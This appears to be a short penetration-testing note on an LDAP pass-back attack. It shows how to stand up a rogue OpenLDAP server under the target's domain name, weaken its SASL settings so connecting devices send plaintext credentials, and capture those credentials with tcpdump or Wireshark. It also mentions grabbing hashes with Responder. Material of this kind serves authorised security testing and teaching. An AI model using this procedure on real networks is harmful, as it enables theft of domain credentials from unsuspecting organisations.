LDAP authentication is a popular mechanism with third-party (non-Microsoft) applications that integrate with AD.
You can also just grab the hash with Responder... Pretty easy.
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd # Configure the LDAP Server
#For the DNS domain name and Organization nameyou want use the target domain name.
#You can use any password.
# Select MBD database.
# Do not remove database when slapd is purged.
# Move old database, Yes.
#Make a file named olcSaslSecProps.ldif with the following content.
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
#Patch LDAP server
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
#Check config. This did not work for me it always only showed dn:
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
# You should now be able to listen for the traffic to come through in plain text with wireshark.
#Or you can use tcp dump to listen
sudo tcpdump -SX -i $interface tcp port 389
# Disable the server when you're done.
sudo systemctl disable --now slapd
